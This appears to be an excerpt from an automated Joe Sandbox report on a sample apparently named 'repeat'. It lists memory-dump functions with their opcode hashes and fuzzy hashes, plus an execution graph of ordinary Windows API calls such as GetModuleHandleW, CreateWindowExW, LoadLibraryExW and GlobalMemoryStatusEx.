                                                                                Function 06762A8F Relevance: .0, Instructions: 24COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.2416905697.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_6760000_repeat.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: f6907717c9dac6f14f9876cfe3dd05cd3a576fd692195f43dd44f977b766f746
                                                                                • Instruction ID: 2461c9ce62b392cafc8cbf73119f3379b408818b90a31b45849a0a570976bf4d
                                                                                • Opcode Fuzzy Hash: f6907717c9dac6f14f9876cfe3dd05cd3a576fd692195f43dd44f977b766f746
                                                                                • Instruction Fuzzy Hash: B2F06D70A04158CFCB94EF58D9856EA7BF1BB49310F0592A5E84DA7346CA349E408FD5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 067661E3 Relevance: .0, Instructions: 14COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.2416905697.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_6760000_repeat.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 851c54aa97e2201aa0ae8f10bad35012e67e3d1a387fb080dff8c228a8171f55
                                                                                • Instruction ID: 6578b666e7e6cb18405718bbe110617611f1cacd7d69780f64e285b983b890cf
                                                                                • Opcode Fuzzy Hash: 851c54aa97e2201aa0ae8f10bad35012e67e3d1a387fb080dff8c228a8171f55
                                                                                • Instruction Fuzzy Hash: D2D0A774400316AFF7404A648409AA53BA4B745330F100222A805F3585D9AC0C41C7A1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0676F970 Relevance: .0, Instructions: 11COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.2416905697.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_6760000_repeat.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 2f9c937b705b733c9644217cffe37b903ab6a11d94893328ab2d7921f8117b8c
                                                                                • Instruction ID: 89f7625bcd3042e5662e2b0f59687678129b36ffb3fe7dec0c562e4284fda470
                                                                                • Opcode Fuzzy Hash: 2f9c937b705b733c9644217cffe37b903ab6a11d94893328ab2d7921f8117b8c
                                                                                • Instruction Fuzzy Hash: 05C04C753042085F9344DA9DD851C26F7E9DBD8614714C06DA90DC7351EA72FD13C694
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Execution Graph

                                                                                Execution Coverage:12.2%
                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                Signature Coverage:0%
                                                                                Total number of Nodes:165
                                                                                Total number of Limit Nodes:13
                                                                                execution_graph 40620 155d044 40621 155d05c 40620->40621 40622 155d0b6 40621->40622 40627 657ed74 40621->40627 40631 657fad7 40621->40631 40635 657fae8 40621->40635 40639 657fc11 40621->40639 40628 657ed7f 40627->40628 40643 657edac 40628->40643 40630 657fc27 40630->40622 40632 657fae5 40631->40632 40633 657ed74 GetModuleHandleW 40632->40633 40634 657fb1a 40633->40634 40634->40622 40636 657fb0e 40635->40636 40637 657ed74 GetModuleHandleW 40636->40637 40638 657fb1a 40637->40638 40638->40622 40640 657fc20 40639->40640 40641 657edac GetModuleHandleW 40640->40641 40642 657fc27 40641->40642 40642->40622 40644 657edb7 40643->40644 40646 657fcf8 40644->40646 40647 657c2b4 40644->40647 40648 657d538 GetModuleHandleW 40647->40648 40650 657d5ad 40648->40650 40650->40646 40651 15a0848 40653 15a084e 40651->40653 40652 15a091b 40653->40652 40657 6573e18 40653->40657 40661 6573e28 40653->40661 40665 15a1380 40653->40665 40658 6573e28 40657->40658 40671 6573634 40658->40671 40662 6573e37 40661->40662 40663 6573634 4 API calls 40662->40663 40664 6573e58 40663->40664 40664->40653 40667 15a1378 40665->40667 40666 15a137d 40666->40653 40667->40666 40787 15a7208 40667->40787 40791 15a7320 40667->40791 40798 15a71f9 40667->40798 40672 657363f 40671->40672 40675 6574d8c 40672->40675 40674 65757de 40674->40674 40676 6574d97 40675->40676 40677 6575f04 40676->40677 40679 6577b88 40676->40679 40677->40674 40680 6577ba9 40679->40680 40681 6577bcd 40680->40681 40684 6577d38 40680->40684 40688 6577d28 40680->40688 40681->40677 40686 6577d45 40684->40686 40685 6577d7e 40685->40681 40686->40685 40695 6576aac 40686->40695 40689 6577da4 40688->40689 40690 6577d37 40688->40690 40692 6576ae0 4 API calls 40689->40692 40693 6577df0 40689->40693 40691 6577d7e 40690->40691 40694 6576aac 4 API calls 40690->40694 40691->40681 40692->40693 40693->40693 40694->40691 40696 6576ab7 40695->40696 40698 6577df0 40696->40698 40699 6576ae0 40696->40699 40698->40698 40700 6576aeb 40699->40700 40706 6576af0 40700->40706 40702 6577e5f 40710 657d080 40702->40710 40719 657d068 40702->40719 40703 6577e99 40703->40698 40709 6576afb 40706->40709 40707 6579000 40707->40702 40708 6577b88 4 API calls 40708->40707 40709->40707 40709->40708 40712 657d0b1 40710->40712 40713 657d1b1 40710->40713 40711 657d0bd 40711->40703 40712->40711 40727 657d2f8 40712->40727 40731 657d2e8 40712->40731 40713->40703 40714 657d0fd 40736 657e5e9 40714->40736 40745 657e5f8 40714->40745 40721 657d080 40719->40721 40720 657d0bd 40720->40703 40721->40720 40725 657d2f8 3 API calls 40721->40725 40726 657d2e8 3 API calls 40721->40726 40722 657d0fd 40723 657e5e9 2 API calls 40722->40723 40724 657e5f8 2 API calls 40722->40724 40723->40720 40724->40720 40725->40722 40726->40722 40754 657d348 40727->40754 40763 657d338 40727->40763 40728 657d302 40728->40714 40732 657d2e7 40731->40732 40732->40731 40734 657d348 2 API calls 40732->40734 40735 657d338 2 API calls 40732->40735 40733 657d302 40733->40714 40734->40733 40735->40733 40737 657e5f8 40736->40737 40772 657eb50 40737->40772 40777 657eb60 40737->40777 40738 657e6a6 40739 657e6d2 40738->40739 40740 657c2b4 GetModuleHandleW 40738->40740 40739->40739 40741 657e716 40740->40741 40744 657f8e5 CreateWindowExW 40741->40744 40744->40739 40746 657e623 40745->40746 40751 657eb50 GetModuleHandleW 40746->40751 40752 657eb60 GetModuleHandleW 40746->40752 40747 657e6a6 40748 657c2b4 GetModuleHandleW 40747->40748 40750 657e6d2 40747->40750 40749 657e716 40748->40749 40782 657f8e5 40749->40782 40751->40747 40752->40747 40755 657d359 40754->40755 40758 657d37c 40754->40758 40756 657c2b4 GetModuleHandleW 40755->40756 40757 657d364 40756->40757 40757->40758 40762 657d5d1 GetModuleHandleW 40757->40762 40758->40728 40759 657d580 GetModuleHandleW 40761 657d5ad 40759->40761 40760 657d374 40760->40758 40760->40759 40761->40728 40762->40760 40764 657d33d 40763->40764 40765 657c2b4 GetModuleHandleW 40764->40765 40767 657d37c 40764->40767 40766 657d364 40765->40766 40766->40767 40771 657d5d1 GetModuleHandleW 40766->40771 40767->40728 40768 657d580 GetModuleHandleW 40770 657d5ad 40768->40770 40769 657d374 40769->40767 40769->40768 40770->40728 40771->40769 40774 657eb8d 40772->40774 40773 657ec0e 40774->40773 40775 657f0c7 GetModuleHandleW 40774->40775 40776 657f0d8 GetModuleHandleW 40774->40776 40775->40773 40776->40773 40778 657eb8d 40777->40778 40779 657ec0e 40778->40779 40780 657f0c7 GetModuleHandleW 40778->40780 40781 657f0d8 GetModuleHandleW 40778->40781 40780->40779 40781->40779 40783 657f8e9 40782->40783 40784 657f91d CreateWindowExW 40782->40784 40783->40750 40786 657fa54 40784->40786 40786->40786 40789 15a721e 40787->40789 40788 15a738a 40788->40667 40789->40788 40802 659dfcf 40789->40802 40792 15a732a 40791->40792 40795 659c0e0 3 API calls 40792->40795 40797 15a7344 40792->40797 40811 659c0d1 40792->40811 40793 15a738a 40793->40667 40795->40797 40796 659dfcf 3 API calls 40796->40793 40797->40793 40797->40796 40800 15a721e 40798->40800 40799 15a738a 40799->40667 40800->40799 40801 659dfcf 3 API calls 40800->40801 40801->40799 40803 659dfda 40802->40803 40806 659c0e0 40803->40806 40805 659dfe1 40805->40788 40807 659c0f5 40806->40807 40808 659c30a 40807->40808 40809 659c738 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 40807->40809 40810 659c728 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 40807->40810 40808->40805 40809->40807 40810->40807 40812 659c0f5 40811->40812 40813 659c30a 40812->40813 40814 659c738 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 40812->40814 40815 659c728 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 40812->40815 40813->40797 40814->40812 40815->40812 40816 657d7a0 40817 657d7e2 40816->40817 40818 657d7e8 LoadLibraryExW 40816->40818 40817->40818 40819 657d819 40818->40819 40618 6575178 DuplicateHandle 40619 657520e 40618->40619

                                                                                Executed Functions

                                                                                Function 015A9D78 Relevance: 3.1, Instructions: 3112COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3211839701.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_15a0000_repeat.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: d8116a3b4c7b1c5eedfa7f8aca0ac6c5b53a92bc13f2a3acfbceeb2ad9336976
                                                                                • Instruction ID: 40bf5e6fb65f70133ed0f2623877a317b09912aebfb769897d91a104854bf12d
                                                                                • Opcode Fuzzy Hash: d8116a3b4c7b1c5eedfa7f8aca0ac6c5b53a92bc13f2a3acfbceeb2ad9336976
                                                                                • Instruction Fuzzy Hash: 5F630B31D10B1A8EDB11EF68C8446ADF7B1FF99300F55C69AE4586B121EB70AAD4CF81
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 015AD100 Relevance: 2.3, Instructions: 2310COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3211839701.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_15a0000_repeat.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 2caffb8126d5ea5185569217dc416c67cd07a02579c410daaa18bd4c8a8d5811
                                                                                • Instruction ID: 47a6cdb496f1d1699e05d50582dc1db09ce44f72ebddf02deff2b448666d36bf
                                                                                • Opcode Fuzzy Hash: 2caffb8126d5ea5185569217dc416c67cd07a02579c410daaa18bd4c8a8d5811
                                                                                • Instruction Fuzzy Hash: 37331F31D1071A8ECB11EF68C8906ADF7B1FF99300F55C79AD459AB211EB70AAC5CB81
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 015A4AA8 Relevance: .3, Instructions: 266COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3211839701.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_15a0000_repeat.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 6102ac14f88a590805757097af748f6b444c2cc6d50c224711e6ace06ae4bd47
                                                                                • Instruction ID: db4a85c57bfaadfb2bbdc5d12e1b265bde7fe3b88ececdb4e873a4b2a7c4fadb
                                                                                • Opcode Fuzzy Hash: 6102ac14f88a590805757097af748f6b444c2cc6d50c224711e6ace06ae4bd47
                                                                                • Instruction Fuzzy Hash: 47B14D70E40209CFDF10CFE9D9917ADBBF2BF88314F588529D419AB294EBB49845CB81
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 015A3E90 Relevance: .2, Instructions: 238COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3211839701.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_15a0000_repeat.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: aa3aef33bd7f22565b16f94e0bbff527472c031f90ef235abaa3a3ba7788420d
                                                                                • Instruction ID: 8eda2a45022cc2cc0014a1a4151b61ae9dc937321d7ec83ba967b01d04234512
                                                                                • Opcode Fuzzy Hash: aa3aef33bd7f22565b16f94e0bbff527472c031f90ef235abaa3a3ba7788420d
                                                                                • Instruction Fuzzy Hash: 28917070E40209DFDF50CFA9C9817EDBBF2BF88314F588129E515AB294DB749845CB91
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 015AF7C0 Relevance: 1.8, Strings: 1, Instructions: 567COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3211839701.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_15a0000_repeat.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: _
                                                                                • API String ID: 0-701932520
                                                                                • Opcode ID: b4c8c60510de58c65cb2010841be9524b30b328fbce133a3738b3d345bd83daa
                                                                                • Instruction ID: 6eafb8c88002dcb40961de96ddc16aef7608ea9852187d933e5424599b90cb4c
                                                                                • Opcode Fuzzy Hash: b4c8c60510de58c65cb2010841be9524b30b328fbce133a3738b3d345bd83daa
                                                                                • Instruction Fuzzy Hash: 02324934A402048FDB25CF68C584A9DBBF2FB45314F9485AAE459EF366D735EC82CB81
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0657D348 Relevance: 1.7, APIs: 1, Instructions: 200COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 3119 657d348-657d357 3120 657d383-657d387 3119->3120 3121 657d359-657d366 call 657c2b4 3119->3121 3123 657d39b-657d3dc 3120->3123 3124 657d389-657d393 3120->3124 3127 657d37c 3121->3127 3128 657d368-657d376 call 657d5d1 3121->3128 3130 657d3de-657d3e6 3123->3130 3131 657d3e9-657d3f7 3123->3131 3124->3123 3127->3120 3128->3127 3137 657d4b8-657d578 3128->3137 3130->3131 3132 657d41b-657d41d 3131->3132 3133 657d3f9-657d3fe 3131->3133 3138 657d420-657d427 3132->3138 3135 657d400-657d407 call 657c2c0 3133->3135 3136 657d409 3133->3136 3140 657d40b-657d419 3135->3140 3136->3140 3170 657d580-657d5ab GetModuleHandleW 3137->3170 3171 657d57a-657d57d 3137->3171 3141 657d434-657d43b 3138->3141 3142 657d429-657d431 3138->3142 3140->3138 3143 657d43d-657d445 3141->3143 3144 657d448-657d451 call 6575af4 3141->3144 3142->3141 3143->3144 3150 657d453-657d45b 3144->3150 3151 657d45e-657d463 3144->3151 3150->3151 3152 657d465-657d46c 3151->3152 3153 657d481-657d48e 3151->3153 3152->3153 3155 657d46e-657d47e call 657a29c call 657c2d0 3152->3155 3160 657d4b1-657d4b7 3153->3160 3161 657d490-657d4ae 3153->3161 3155->3153 3161->3160 3172 657d5b4-657d5c8 3170->3172 3173 657d5ad-657d5b3 3170->3173 3171->3170 3173->3172
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3244234008.0000000006570000.00000040.00000800.00020000.00000000.sdmp, Offset: 06570000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_6570000_repeat.jbxd
                                                                                Similarity
                                                                                • API ID: HandleModule
                                                                                • String ID:
                                                                                • API String ID: 4139908857-0
                                                                                • Opcode ID: 2770fdd5b6a6beb4fad0ccbc7b26af017c7bf33ba346d73fb570f200fbfc12ce
                                                                                • Instruction ID: 96eb85e6c4288bb63f46d599348901cd05f5bc7debec762f60ddc7f860e6c7f1
                                                                                • Opcode Fuzzy Hash: 2770fdd5b6a6beb4fad0ccbc7b26af017c7bf33ba346d73fb570f200fbfc12ce
                                                                                • Instruction Fuzzy Hash: DD812570A00B058FD7A4DF69E44475ABBF6FF88204F008A29D48AD7A50D775E945CFA0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0657F8E5 Relevance: 1.6, APIs: 1, Instructions: 139COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0657FA42
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3244234008.0000000006570000.00000040.00000800.00020000.00000000.sdmp, Offset: 06570000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_6570000_repeat.jbxd
                                                                                Similarity
                                                                                • API ID: CreateWindow
                                                                                • String ID:
                                                                                • API String ID: 716092398-0
                                                                                • Opcode ID: 5c0ece28b997f3ce9d17a9877e7908af721115590ae9db00357975ebeec35d04
                                                                                • Instruction ID: 9b68d9847b40fb557bc18845c01dd4e19cc0bb6728de78f01e1745c18ea4bbcf
                                                                                • Opcode Fuzzy Hash: 5c0ece28b997f3ce9d17a9877e7908af721115590ae9db00357975ebeec35d04
                                                                                • Instruction Fuzzy Hash: 6D51F0B1C00249EFDF15CF99D984ADDBFB6BF48304F24816AE818AB220D7759985CF90
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0659D2F8 Relevance: 1.6, APIs: 1, Instructions: 126COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3244886573.0000000006590000.00000040.00000800.00020000.00000000.sdmp, Offset: 06590000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_6590000_repeat.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 87aea0d67951557dc6752282d837caf883d816f47e1cdc10cce6fc4127d8686a
                                                                                • Instruction ID: b28be2a10d4270265e6a670a5e5742c10b23cb12948eef2cc2e15ba9924dc899
                                                                                • Opcode Fuzzy Hash: 87aea0d67951557dc6752282d837caf883d816f47e1cdc10cce6fc4127d8686a
                                                                                • Instruction Fuzzy Hash: 0E411172D047968FCB04CFB9D8102AEBFF1BF89210F14866AD408A7251DB789885CBE1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0657F924 Relevance: 1.6, APIs: 1, Instructions: 119COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0657FA42
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3244234008.0000000006570000.00000040.00000800.00020000.00000000.sdmp, Offset: 06570000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_6570000_repeat.jbxd
                                                                                Similarity
                                                                                • API ID: CreateWindow
                                                                                • String ID:
                                                                                • API String ID: 716092398-0
                                                                                • Opcode ID: f817db578717c3f02ed6c363a1bf07f7bec8e7a5859d4ee8ed319be0185ec975
                                                                                • Instruction ID: 9b4530904fbd1f73318b5d74bafca8136752b16438e0d8e445dfcc12bd618121
                                                                                • Opcode Fuzzy Hash: f817db578717c3f02ed6c363a1bf07f7bec8e7a5859d4ee8ed319be0185ec975
                                                                                • Instruction Fuzzy Hash: BC51C0B1D00349EFDB14CF9AD984ADEBBB5BF48314F24812AE818AB250D7759885CF90
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0657F930 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0657FA42
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3244234008.0000000006570000.00000040.00000800.00020000.00000000.sdmp, Offset: 06570000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_6570000_repeat.jbxd
                                                                                Similarity
                                                                                • API ID: CreateWindow
                                                                                • String ID:
                                                                                • API String ID: 716092398-0
                                                                                • Opcode ID: 1596c1c6f5e024bc46b4cf43bbedbff68fe015c505e0175f59f781094ca8daf6
                                                                                • Instruction ID: 6f76309e6f9cff5d0aba64ed91432a06f967077aaf62940eea6186fa981e3a3b
                                                                                • Opcode Fuzzy Hash: 1596c1c6f5e024bc46b4cf43bbedbff68fe015c505e0175f59f781094ca8daf6
                                                                                • Instruction Fuzzy Hash: 4C41B2B1D00309EFDB14CF99D984ADEBBB5BF48314F24812AE819AB250D7759845CF90
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 06575170 Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 065751FF
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3244234008.0000000006570000.00000040.00000800.00020000.00000000.sdmp, Offset: 06570000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_6570000_repeat.jbxd
                                                                                Similarity
                                                                                • API ID: DuplicateHandle
                                                                                • String ID:
                                                                                • API String ID: 3793708945-0
                                                                                • Opcode ID: c6eef0dfe9122ff6bbfb2a5e17f1b22b87614277422b4c0a1459aa780b5a258f
                                                                                • Instruction ID: 2335f2771d99f90371a52934e1458fe2fe9c5e9c670b167bc11f8a510e0eb685
                                                                                • Opcode Fuzzy Hash: c6eef0dfe9122ff6bbfb2a5e17f1b22b87614277422b4c0a1459aa780b5a258f
                                                                                • Instruction Fuzzy Hash: 282105B5D00208AFDB10CF9AD984ADEFFF9FB48310F10841AE918A3250D778A944CFA0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 06575178 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 065751FF
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3244234008.0000000006570000.00000040.00000800.00020000.00000000.sdmp, Offset: 06570000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_6570000_repeat.jbxd
                                                                                Similarity
                                                                                • API ID: DuplicateHandle
                                                                                • String ID:
                                                                                • API String ID: 3793708945-0
                                                                                • Opcode ID: 1c6c743d837a7530ccab14cf56a7f4e994a4d1d161894c416b1d77cdf3f33458
                                                                                • Instruction ID: 67926d05bc62f80b9e12cd649d95295569a5164abe1ed2f03e80dc85401bd748
                                                                                • Opcode Fuzzy Hash: 1c6c743d837a7530ccab14cf56a7f4e994a4d1d161894c416b1d77cdf3f33458
                                                                                • Instruction Fuzzy Hash: DE21E4B5D002089FDB10CF9AD984ADEBBF8FB48310F14801AE918A3350D779A944CFA4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0657D799 Relevance: 1.6, APIs: 1, Instructions: 57libraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LoadLibraryExW.KERNELBASE(00000000,?,?), ref: 0657D80A
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3244234008.0000000006570000.00000040.00000800.00020000.00000000.sdmp, Offset: 06570000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_6570000_repeat.jbxd
                                                                                Similarity
                                                                                • API ID: LibraryLoad
                                                                                • String ID:
                                                                                • API String ID: 1029625771-0
                                                                                • Opcode ID: 438524b7692c485ae34bfcd8b570c0deb721997ef697dd27c3d16333c0d71c05
                                                                                • Instruction ID: 2795ba98b13416fe626f2021255a6bf51ca5b9cf93f276bd4c32199c18a2cf3e
                                                                                • Opcode Fuzzy Hash: 438524b7692c485ae34bfcd8b570c0deb721997ef697dd27c3d16333c0d71c05
                                                                                • Instruction Fuzzy Hash: D31114B6C002099FDB20CF9AD544ADEFBF8FF89320F10852AD419A7200C779A944CFA5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0659C6B4 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,0659D34A), ref: 0659D437
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3244886573.0000000006590000.00000040.00000800.00020000.00000000.sdmp, Offset: 06590000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_6590000_repeat.jbxd
                                                                                Similarity
                                                                                • API ID: GlobalMemoryStatus
                                                                                • String ID:
                                                                                • API String ID: 1890195054-0
                                                                                • Opcode ID: 0b7907994655a3e1dd20e1d178fcdc155ca38977b43d61c3e3535ed2ab15796f
                                                                                • Instruction ID: 2a91354cb5029ebcef6de8c9af762ae1d1cdc950b04f5a077d34e34e98b0cb9e
                                                                                • Opcode Fuzzy Hash: 0b7907994655a3e1dd20e1d178fcdc155ca38977b43d61c3e3535ed2ab15796f
                                                                                • Instruction Fuzzy Hash: D41103B1C006599BCB10DF9AD544BAEFBF4FF48320F10856AE818A7240D778A944CFE5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0659D3C8 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,0659D34A), ref: 0659D437
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3244886573.0000000006590000.00000040.00000800.00020000.00000000.sdmp, Offset: 06590000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_6590000_repeat.jbxd
                                                                                Similarity
                                                                                • API ID: GlobalMemoryStatus
                                                                                • String ID:
                                                                                • API String ID: 1890195054-0
                                                                                • Opcode ID: 1e8e3a130c9b5b9434a082d80a403c117bc0948ae9ac3ac193a8bdf3da5abe82
                                                                                • Instruction ID: 780d6290a068c15e1ee6dfd0615018d908a3f9cbd6fd6876bbb604c4a14ebc87
                                                                                • Opcode Fuzzy Hash: 1e8e3a130c9b5b9434a082d80a403c117bc0948ae9ac3ac193a8bdf3da5abe82
                                                                                • Instruction Fuzzy Hash: 7D1112B1C006599FCB10DF9AD544AEEFBF5BF48320F14816AD818A7250D778A944CFA1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0657D7A0 Relevance: 1.6, APIs: 1, Instructions: 52libraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LoadLibraryExW.KERNELBASE(00000000,?,?), ref: 0657D80A
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3244234008.0000000006570000.00000040.00000800.00020000.00000000.sdmp, Offset: 06570000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_6570000_repeat.jbxd
                                                                                Similarity
                                                                                • API ID: LibraryLoad
                                                                                • String ID:
                                                                                • API String ID: 1029625771-0
                                                                                • Opcode ID: 0c2c20902a7da48df1ffa37da82268278d04d0d01935be5986de4f7d8faaed2d
                                                                                • Instruction ID: e35369e0d66af3434a79fbc5ee4d01e4c8e74117c87e6accb54c31ed02d62b84
                                                                                • Opcode Fuzzy Hash: 0c2c20902a7da48df1ffa37da82268278d04d0d01935be5986de4f7d8faaed2d
                                                                                • Instruction Fuzzy Hash: CC11F0B6C002499FDB20CF9AD944ADEFBF8FF88320F10852AD519A7210C779A545CFA5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0657C2B4 Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,0657D364), ref: 0657D59E
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.3244234008.0000000006570000.00000040.00000800.00020000.00000000.sdmp, Offset: 06570000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_6570000_repeat.jbxd
                                                                                Similarity
                                                                                • API ID: HandleModule
                                                                                • String ID:
                                                                                • API String ID: 4139908857-0
                                                                                • Opcode ID: 6527bf31f811e6a665e1c1eed1c1c323fe24bef5f2208e6c9c5c19e365282b76
                                                                                • Instruction ID: 212cbdeb91774dc69bad83966adb3f5d45031b7c25a95a89889e5e85290fb2c0
                                                                                • Opcode Fuzzy Hash: 6527bf31f811e6a665e1c1eed1c1c323fe24bef5f2208e6c9c5c19e365282b76
